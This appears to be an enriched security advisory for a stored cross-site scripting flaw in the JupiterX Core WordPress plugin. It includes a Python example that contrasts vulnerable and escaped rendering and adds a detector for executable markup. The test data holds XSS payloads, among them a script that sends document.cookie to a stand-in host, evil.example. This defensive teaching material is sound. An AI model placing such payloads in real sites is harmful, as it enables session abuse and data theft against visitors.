Impact
Improper neutralization of input during web page generation (CWE-79) permits stored cross-site scripting in the JupiterX Core WordPress plugin. An attacker who can save content through the plugin can store JavaScript that executes in the browser of every visitor, including logged-in administrators, who later views a page built with it. Possible consequences include actions performed in the victim's authenticated session, defaced content, and redirection to malicious sites. Note that WordPress sets its authentication cookies with the HttpOnly flag, so outright session-cookie theft is less likely than script-driven requests made from the victim's session; in an administrator's browser those requests can reach privileged functions such as user and plugin management.
Affected Systems
The issue is present in the JupiterX Core plugin distributed by artbees and affects all versions up to and including 4.11.0. No fixed release is stated on this page, so any installation at 4.11.0 or below should be treated as vulnerable and updated to the current plugin release.
Risk and Exploitability
The CVSS base score of 6.5 places the vulnerability in the Medium severity band, and an EPSS score below 1% indicates a low estimated probability of exploitation in the wild over the next 30 days. The vulnerability is not listed in the CISA KEV catalog. The advisory does not detail the exact prerequisites, but the attack vector is consistent with a stored injection through plugin input fields: an attacker with an account permitted to edit content through the plugin (the required privilege level is not stated) saves a payload once, and every subsequent visitor to the affected page, including administrators, executes it. A low EPSS score describes population-level exploitation likelihood, not the exposure of a particular site. For multi-author sites, sites that accept content from untrusted users, and sites without compensating controls such as a web application firewall or a Content Security Policy, the risk remains material, and updating the plugin is the primary fix.
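As an added illustration of the pattern described above (not code from JupiterX Core or from the advisory), the following Python models a page-builder element whose fields are filled in by a site user and rendered into a page. `render_vulnerable` concatenates the stored values straight into markup, while `render_hardened` escapes each value for the context it lands in (text node, quoted attribute, URL attribute) and rejects non-http(s) link schemes. A small `html.parser`-based check then reports any executable constructs that appear in the rendered output. The element data and field names are constructed for the example; they are not taken from the plugin.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page-builder element saved by a low-privileged user.
# The values are attacker-controlled test data invented for this example.
ELEMENT = {
    "title": "Welcome<script>document.location='https://evil.example/?c='+document.cookie</script>",
    "css_class": 'hero" onmouseover="alert(1)',
    "link": "javascript:alert(document.domain)",
}


def render_vulnerable(el: dict) -> str:
    """Concatenates stored field values directly into markup (CWE-79)."""
    return (
        f'<div class="{el["css_class"]}">'
        f'<a href="{el["link"]}">{el["title"]}</a>'
        f"</div>"
    )


def safe_url(value: str) -> str:
    """Allow only http(s) and scheme-less (relative) URLs; anything else becomes an empty href."""
    value = value.strip()
    scheme = urlparse(value).scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return ""
    return value


def render_hardened(el: dict) -> str:
    """Escapes each value for the HTML context it is written into."""
    title = html.escape(el["title"], quote=False)          # text node: escape < > &
    css_class = html.escape(el["css_class"], quote=True)   # double-quoted attribute: also escape quotes
    link = html.escape(safe_url(el["link"]), quote=True)   # URL attribute: scheme check, then attribute escape
    return f'<div class="{css_class}"><a href="{link}">{title}</a></div>'


class ActiveContentFinder(HTMLParser):
    """Records script elements, on* event-handler attributes and javascript: hrefs."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            if name == "href" and value and value.strip().lower().startswith("javascript:"):
                self.findings.append("javascript: URL")
        if tag == "script":
            self.findings.append("script element")


def find_active_content(markup: str) -> list[str]:
    """Parse rendered markup the way a browser would and list executable constructs."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        out = render(ELEMENT)
        print(f"{label}: {out}")
        print(f"  active content: {find_active_content(out) or 'none'}")
```

The parser-based check is deliberately run on the rendered output rather than on the stored input, because stored XSS is an output-encoding failure: the same string is harmless inside a text node and dangerous inside an attribute or URL. In a WordPress plugin the equivalent of the hardened render is to pass each value through the core escaping functions at output time, `esc_html()` for text, `esc_attr()` for attribute values, `esc_url()` for links, and `wp_kses_post()` where limited HTML must be preserved.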
OpenCVE Enrichment